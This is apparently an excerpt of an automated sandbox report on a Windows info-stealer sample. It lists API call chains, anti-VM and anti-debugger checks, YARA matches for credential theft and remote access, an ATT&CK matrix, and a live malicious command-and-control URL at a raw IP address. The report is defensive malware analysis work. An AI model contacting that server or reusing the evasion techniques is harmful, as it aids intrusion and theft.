                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B3B29C push ecx; ret 0_2_00B3B2AF
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B20F59 pushfd ; iretd 0_2_00B21078
                    Source: cdc57Mn7dE.exeStatic PE information: section name: .text entropy: 7.488896312767425
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26346
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeEvaded block: after key decisiongraph_0-27507
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeAPI coverage: 6.4 %
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B2DCE7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B2C0D7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B2E077
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B21937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B21937
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B2F917
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B34107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B34107
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B2E697
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B2EF87
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B347D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B347D7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B33B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B33B17
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B34B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B34B77
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.15.drBinary or memory string: VMware
                    Source: Amcache.hve.15.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.15.drBinary or memory string: VMware, Inc.
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwaret$|
                    Source: Amcache.hve.15.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.15.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.15.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.15.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, cdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.15.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.15.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.15.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.15.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.15.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.15.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.15.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.15.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.15.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.15.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.15.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.15.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.15.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.15.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.15.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.15.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.15.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                    Source: Amcache.hve.15.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeAPI call chain: ExitProcess graph end nodegraph_0-26345
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeAPI call chain: ExitProcess graph end nodegraph_0-26334
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeAPI call chain: ExitProcess graph end nodegraph_0-26331
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeAPI call chain: ExitProcess graph end nodegraph_0-26351
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeAPI call chain: ExitProcess graph end nodegraph_0-26173
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeAPI call chain: ExitProcess graph end nodegraph_0-26374
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeAPI call chain: ExitProcess graph end nodegraph_0-26219
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0083B4B3 push dword ptr fs:[00000030h]0_2_0083B4B3
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B399B7 mov eax, dword ptr fs:[00000030h]0_2_00B399B7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B20D90 mov eax, dword ptr fs:[00000030h]0_2_00B20D90
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2092B mov eax, dword ptr fs:[00000030h]0_2_00B2092B
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B3B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B3B5A1
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B3D151 SetUnhandledExceptionFilter,0_2_00B3D151
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B3AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B3AFAF
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: cdc57Mn7dE.exe PID: 60, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B39867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00B39867
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00B37DF7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.15.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.15.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.15.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.cdc57Mn7dE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cdc57Mn7dE.exe.b20e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.cdc57Mn7dE.exe.b90000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cdc57Mn7dE.exe.b20e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.cdc57Mn7dE.exe.b90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cdc57Mn7dE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1268758172.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cdc57Mn7dE.exe PID: 60, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.cdc57Mn7dE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cdc57Mn7dE.exe.b20e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.cdc57Mn7dE.exe.b90000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cdc57Mn7dE.exe.b20e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.cdc57Mn7dE.exe.b90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cdc57Mn7dE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1268758172.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cdc57Mn7dE.exe PID: 60, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    cdc57Mn7dE.exe42%ReversingLabs
                    cdc57Mn7dE.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://62.204.41.177/edd20096ecef326d.phptrue
                      unknown
                      http://62.204.41.177/true
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://62.204.41.177/ncdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
